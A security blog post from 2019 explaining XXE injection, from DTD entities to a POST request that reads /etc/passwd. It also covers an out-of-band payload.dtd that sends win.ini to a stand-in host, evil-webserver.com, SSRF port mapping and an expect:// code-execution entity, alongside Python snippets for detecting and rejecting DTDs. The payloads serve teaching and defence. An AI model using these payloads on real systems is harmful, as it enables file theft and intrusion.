22 July 2019

A Deep Dive into XXE Injection

Trenton Gordon

Written by Synack Sr. Security Program Analyst Trent Gordon
Editing and vulnerability reference by Senior Manager, Technical Operations Jake Garner

In my career as a Security Program Analyst with Synack, I am privileged to see hundreds of unique attacks, every day, from the best security researchers in the world. These range in complexity from a simple XSS on a forum post to highly sophisticated Blind SQL Injections with out-of-band exfiltration via DNS. Sitting on the front lines of web exploitation is humbling; above all, it gives me a unique opportunity to learn from the best by examining new attacks and new techniques for exploiting old vulnerabilities. I am able to follow trends in web security and see which attack techniques are more successful than others in the modern web. Of these recent trends, one of my favorite attack types is XML External Entity (XXE) Injection. I find this attack interesting for a number of reasons: it’s widely prevalent, it has numerous different attack vectors, and it remains one of the lesser-known vulnerabilities amongst junior security researchers.

XXE Injection has been on the OWASP Top 10 list since its 2017 edition and frequently appears in submissions from the Synack Red Team (SRT). XXE Injection is not limited to web applications; anywhere there is an XML parser (web, host, software), the potential for XXE exists. A Google search for “XXE Exploits” returns several write-ups of successful XXE attacks against well-defended targets, often with high bounty payouts.

Despite this, XXE seems to be seldom taught in web security classes, passed over in favor of “easier” attacks such as CSRF and XSS. Of the infosec courses I’ve taken, only one even mentioned XXE, referring to it as an advanced exploitation technique. In an effort to demystify this exploit, I’m going to break down how XXE works, walk through some ways to exploit XXE vulnerabilities, and cover two real-world XXE attacks submitted by the SRT (with redacted data to protect client and SRT identities).

1. XML and its ENTITYs

The best part about XXE is that it is entirely valid functionality of the XML language. There is no black magic with this attack, simply an abusable feature that is frequently enabled by default. This feature is the external entity.
To understand ENTITYs, we must first look at Document Type Definitions (DTDs). A DTD uses a special XML declaration syntax to describe the format or structure of an XML document, and DTDs are used to establish consistency amongst different, separate XML files. A DTD can live in its own .dtd file or be declared inline, and it can contain a declaration called an ENTITY. See below for an example DTD:

<!DOCTYPE STRUCTURE [
<!ELEMENT SPECIFICATIONS (#PCDATA)>
<!ENTITY VERSION "1.1">
<!ENTITY file SYSTEM "file:///c:/server_files/application.conf" >
]>

We won’t split hairs about DTD syntax; just understand that any XML referencing this DTD will need to follow its structure (source).

The ENTITY declarations within are simply named shortcuts to a value, such as a piece of text or a special character, that can be referenced by the calling XML file (source). Notice that the last ENTITY declaration actually pulls in the contents of a local file, via the SYSTEM keyword.

The above .dtd file might be used as follows:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://validserver.com/formatting.dtd">
<specifications>&file;</specifications>

formatting.dtd is referenced by the DOCTYPE declaration, and the XML file can then use the ENTITYs and structure it defines; here, &file; is replaced by the contents of application.conf.

ENTITYs can also be used without the formality of a separate .dtd file. By writing declarations inside square brackets [] in the DOCTYPE (an internal DTD subset), you can declare ENTITY tags for use in only that XML file. Below, the application.conf file is referenced for use in <configuration></configuration> tags, without a separate .dtd file to host it:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE example [
<!ELEMENT example ANY >
<!ENTITY file SYSTEM "file:///c:/server_files/application.conf" >
]>
<configuration>&file;</configuration>
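Whether a SYSTEM entity like this is ever resolved depends entirely on the parser. As a minimal sketch, assuming CPython’s standard-library xml.etree.ElementTree (backed by expat): an internal entity declared in the DOCTYPE is expanded into the text, while, per the Python documentation, ElementTree does not expand external entities and raises a ParseError instead. The helper name root_text is hypothetical, and the entity values mirror the example above.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text is declared inline in the DOCTYPE.
INTERNAL = """<!DOCTYPE example [
<!ENTITY version "1.1">
]>
<configuration>version &version;</configuration>"""

# External entity: the replacement text lives at a URI (here, a local file).
EXTERNAL = """<!DOCTYPE example [
<!ELEMENT example ANY >
<!ENTITY file SYSTEM "file:///c:/server_files/application.conf" >
]>
<configuration>&file;</configuration>"""


def root_text(doc: str) -> str:
    """Return the root element's text, or a short note if parsing fails."""
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as err:
        # ElementTree reports the SYSTEM entity instead of reading the file.
        return f"refused: {err}"


print(root_text(INTERNAL))  # version 1.1
print(root_text(EXTERNAL))  # refused: ... (exact message varies by version)
```

Other parsers, and other languages’ defaults, may behave differently; a parser that does resolve SYSTEM entities would read application.conf here, which is exactly the behavior XXE abuses.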

So in broad summary:

  • DTD files can be external or internal to an XML file
  • ENTITYs exist within DTD files
  • ENTITYs can call local system files
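The summary above suggests a simple audit: list every ENTITY a document declares and flag the ones with a SYSTEM identifier, since those are what a resolving parser would load from a file or URL. A minimal sketch using Python’s standard-library expat bindings, which report declarations through EntityDeclHandler without fetching anything; list_entities and SAMPLE are hypothetical names.

```python
from xml.parsers import expat

SAMPLE = """<!DOCTYPE example [
<!ENTITY version "1.1">
<!ENTITY file SYSTEM "file:///c:/server_files/application.conf" >
]>
<configuration>&version; &file;</configuration>"""


def list_entities(doc: str) -> list[dict]:
    """Return the ENTITY declarations found in doc's DOCTYPE, in order."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id,
                       public_id, notation_name):
        found.append({
            "name": name,
            "parameter": bool(is_parameter),
            # A SYSTEM identifier means the value comes from a file or URL.
            "external": system_id is not None,
            "system_id": system_id,
        })

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(doc, True)  # expat reports declarations; it never fetches URIs
    return found


for entity in list_entities(SAMPLE):
    print(entity["name"], entity["external"], entity["system_id"])
# version False None
# file True file:///c:/server_files/application.conf
```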

2. Injection Fun

When data is passed to the server in an HTTP Request, it opens up the possibility of abuse from the user. XML is no different. The web developers are either placing their trust in the client to not modify the code, or (the better solution) are putting controls in place to prevent malicious modifications from working. Regardless of the web developer’s intent, mistakes happen and injections are often successfully executed on the server. Here is an example, where data from a form is wrapped in XML and sent to the server to be processed. The attacker will:

  • Intercept the vulnerable POST request with a web proxy (Burpsuite, Zap, etc)
  • Add the injected ENTITY tag and &xxe; variable reference.
    • place the &xxe; reference in a field whose value will be returned and displayed
  • Release the intercepted POST request

This will result in the following crafted POST request (the injected content is the DOCTYPE line and the &xxe; reference in the <body> element):

POST /notes/savenote HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml;charset=UTF-8
Host: myserver.com

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed &xxe;</body>
</note>

The server treats this as valid form data: it parses the XML before saving it on the backend and returns the parsed data in its response. Because the parser resolves the &xxe; entity, the contents of /etc/passwd are displayed alongside the original note.

HTTP/1.1 200 OK
Content-Type: text/xml;charset=UTF-8
Server: Microsoft-IIS/7.5
Date: Fri, 19 Apr 2019 13:08:49 GMT
Connection: close
Content-Length: 1039

Note saved! From Bob to Alice about “Sync Meeting” at 1200: Meeting time changed
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
...snip...

3. Sneaking Out of Band

Admittedly, that was a fairly contrived example. The Synack VulnOps team does occasionally see clear-cut XXEs like this, but most of the time the XML passed to the server isn’t displayed or returned in such a favorable way. In instances where XML is injectable, but not returned to the client in the HTTP response, we turn to those external .dtd files mentioned previously. DOCTYPE references to external .dtd files allow us to conduct this attack entirely out-of-band.

We’ll modify the previous example to reflect this. We’re also going to pretend this is a Windows server, for variety. In the previous example, an ENTITY reference to the file was saved into the xxe variable, which gets referenced in the form. In this example, the ENTITY reference is for our external server, https://evil-webserver.com:

POST /notes/savenote HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml;charset=UTF-8
Host: myserver.com

<?xml version="1.0" ?>
<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM "https://evil-webserver.com/payload.dtd">
%alpha;
%bravo;
]>
<x>&charlie;</x>

<note>
<to>Alice</to>
<from>Bob</from>
<header>Sync Meeting</header>
<time>1200</time>
<body>Meeting time changed</body>
</note>

The external payload.dtd contains the following:

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % bravo "<!ENTITY charlie SYSTEM 'https://evil-webserver.com/?%data;'>">

Take note that file:///c:/windows/win.ini is contained in the .dtd file, rather than within the injected XXE code. This is a stealthy move that allows us to hide which file we’re trying to extract from server access logs.

So, in general terms, this code executes in the following steps:

  • The client sends the POST request with the injected XML code
  • The server, via the XML parser, parses the XML from top to bottom, reaching the injected ENTITY
  • The server requests payload.dtd from https://evil-webserver.com
  • https://evil-webserver.com responds with payload.dtd
  • The code within payload.dtd is parsed by the XML parser, which reads the contents of win.ini and sends it as a parameter in an HTTP GET request back to https://evil-webserver.com

This extracted data can be viewed by the attacker in their web server logs.
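The second step is the pivot of the whole attack: the server only contacts evil-webserver.com because its parser is allowed to resolve the external parameter entity %alpha;. The Python sketch below uses the standard library’s expat bindings to record which URIs the parser asks to load, with parameter-entity parsing switched on and off. The handler only records each request and reports success, so nothing is actually downloaded; for that reason the document is trimmed to the first stage, since bravo and charlie would only exist once payload.dtd had been fetched. requested_uris and INJECTED are hypothetical names.

```python
from xml.parsers import expat

# First stage of the injected DOCTYPE above (bravo/charlie omitted).
INJECTED = """<!DOCTYPE hack [
<!ELEMENT x ANY >
<!ENTITY % alpha SYSTEM "https://evil-webserver.com/payload.dtd">
%alpha;
]>
<x/>"""


def requested_uris(doc: str, resolve_parameter_entities: bool) -> list[str]:
    """Return the external URIs the parser asks to load while parsing doc."""
    requests = []

    def on_external_ref(context, base, system_id, public_id):
        requests.append(system_id)
        return 1  # report success without reading anything

    parser = expat.ParserCreate()
    parser.ExternalEntityRefHandler = on_external_ref
    parser.SetParamEntityParsing(
        expat.XML_PARAM_ENTITY_PARSING_ALWAYS if resolve_parameter_entities
        else expat.XML_PARAM_ENTITY_PARSING_NEVER
    )
    parser.Parse(doc, True)
    return requests


print(requested_uris(INJECTED, True))   # ['https://evil-webserver.com/payload.dtd']
print(requested_uris(INJECTED, False))  # []
```

With parameter-entity parsing disabled, the %alpha; reference is never followed, so the chain stops before payload.dtd is requested.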

Side note: If the various alpha/bravo/charlie entity references in this example are confusing, know that there are several ways of executing the same XXE attack, each aimed at bypassing web filters or appeasing finicky XML parsers. Several variations are collected on GitHub (credit to staaldraad).

4. Pass the SOAP

Take, for example, a submission we once received (sensitive info redacted for client and researcher privacy). An SRT member found a web service that offered numerous SOAP API methods. SOAP (Simple Object Access Protocol) is a messaging protocol that lets different applications exchange structured data with each other. More importantly for us, its messages are structured as XML, making it potentially vulnerable to XXE.

In this instance, the various API methods had <XMLData> sections that could contain injected ENTITY tags. So, issuing a POST request with such an injected ENTITY to the /ConductOrders.asmx endpoint would generate a request to an attacker’s web server.

As a result, the server fetches the contents of the external DTD at http://evil-webserver/data.xml.

That DTD instructs the XML parser to send the contents of the local c:\windows\win.ini file to the attacker’s server by appending them to the request URL through the charlie entity, making them viewable in the attacker’s server logs.

And just like that, any local file readable by the web server was his to steal.

Note: Permissions matter in this attack. If the account the web server runs as (for example, www-data) does not have read permission on a file, the parser cannot retrieve it. This is why these Proofs of Concept (PoCs) pull /etc/passwd, which is world-readable, instead of /etc/shadow, which is typically restricted to root.
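The permission check behind that choice can be sketched in a few lines of Python, assuming the web server’s account is neither the file’s owner nor a member of its group, so only the “other” read bit applies. The modes shown are common defaults (for example, 0644 for /etc/passwd and 0640 for /etc/shadow on Debian-based systems) but vary by distribution; on a live host, os.stat(path).st_mode supplies the real value. readable_by_others is a hypothetical helper name.

```python
import stat


def readable_by_others(mode: int) -> bool:
    """True if the 'other' read bit (S_IROTH) is set in a Unix file mode."""
    return bool(mode & stat.S_IROTH)


print(readable_by_others(0o644))  # True: e.g. /etc/passwd
print(readable_by_others(0o640))  # False: e.g. /etc/shadow on Debian-based systems
```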

5. Recon with XXE

Like many exploits, XXE gets extra interesting when you start chaining it with other vulnerabilities. XXE to gain Local File Disclosure (LFD) is useful as a PoC, but a real attacker might want to do more with XXE than just read local files (especially since this attack is limited by the permissions of the web server). Since XXE makes the server issue requests on the attacker’s behalf, an attacker can use the XML parser to perform Server Side Request Forgery (SSRF) and map internal hosts and/or ports. Such an XXE + SSRF submission came across our queue last year. This specific vulnerability was exploited against JAMF Software, which uses an XML-based protocol (like SOAP), making it potentially vulnerable to XXE.

Take note of the second line of the submitted XML: <!DOCTYPE dtd SYSTEM "https://127.0.0.1:445">

Rather than calling an external DTD or local file like the previous examples, this researcher instructs the server to call its localhost (127.0.0.1) on a designated port. If the port is open, the server responds quickly. If the port is closed, the connection attempt fails and the response takes noticeably longer to come back. In this instance, the difference in response times between open and closed ports was significant enough to blindly map the internal host’s ports. Scaling this same attack across many ports with Burp Intruder produced the following results.

In the results, ports 21, 22, 23, and 443 returned significantly longer response times, suggesting they were not open internally. From this attack, the SRT concluded that ports 80, 445, and 8443 were internally accessible. Of these, port 445 was of particular interest, as it was not openly accessible from the internet, providing a unique attack surface. If taken further, this SSRF exploitation could then test for internal hosts, providing a method to map the private intranet endpoints that are accessible by the web server.
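The inference here is a comparison against a baseline. A minimal Python sketch, assuming you already have one response time per port (for example, exported from Burp Intruder): ports whose time exceeds a multiple of the fastest observed response are flagged as slow. The factor of 3 and the function name split_by_latency are hypothetical choices. In this target, slow meant closed; on another target the relationship may differ, so the threshold should be checked against ports whose state is already known.

```python
def split_by_latency(timings_ms: dict[int, float],
                     factor: float = 3.0) -> dict[str, list[int]]:
    """Group ports into 'fast' and 'slow' relative to the fastest response.

    timings_ms maps port number -> response time in milliseconds.
    A port is 'slow' when its time exceeds factor * the minimum time.
    """
    groups: dict[str, list[int]] = {"fast": [], "slow": []}
    if not timings_ms:
        return groups
    baseline = min(timings_ms.values())
    for port in sorted(timings_ms):
        key = "slow" if timings_ms[port] > factor * baseline else "fast"
        groups[key].append(port)
    return groups
```

Using the fastest response as the baseline keeps the split meaningful even when most scanned ports are closed, though it breaks down if every port in the scan is closed.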

6. Final Thoughts

XXE Injection can be as simple or as complex as the application allows. Google can quickly show you examples of various advanced XXE attack vectors. The Billion Laughs attack abuses the same entity mechanism, nesting entities that expand exponentially, to cause a Denial of Service (DoS). More nefariously, having the PHP Expect module installed can result in code execution from an XXE attack (<!ENTITY rce SYSTEM "expect://ifconfig" >).
Defenses exist against XXE (OWASP maintains an XXE Prevention Cheat Sheet), but ultimately this is a vulnerability in a weakly configured XML parser. XXE is not a flaw in XML that can be patched, but rather an exploit against applications where external entity processing is enabled unintentionally or input goes unsanitized. Ultimately it is an attack largely dependent on human error, and that means it’s here to stay.
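A common recommendation in OWASP’s guidance is to disable DTDs entirely when the application does not need them. A minimal Python sketch of that idea using only the standard library: a first expat pass refuses any document containing a DOCTYPE, and only then is the input handed to ElementTree. DTDForbidden, reject_dtd, and parse_untrusted are hypothetical names; parsing twice is a simplicity trade-off, not a requirement.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when an XML document contains a DOCTYPE declaration."""


def reject_dtd(data: str) -> None:
    """Raise DTDForbidden if data declares any DTD, inline or external."""

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Any DOCTYPE at all is refused, so no ENTITY can ever be declared.
        raise DTDForbidden(f"DOCTYPE {name!r} is not allowed")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)  # the handler's exception propagates out of Parse


def parse_untrusted(data: str) -> ET.Element:
    """Parse XML only after confirming it carries no DTD."""
    reject_dtd(data)
    return ET.fromstring(data)
```

A plain note such as <note><to>Alice</to></note> parses normally, while the injected request body from section 2 is rejected before any entity is considered. The third-party defusedxml package packages the same idea (its parsers accept a forbid_dtd option) if adding a dependency is acceptable.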

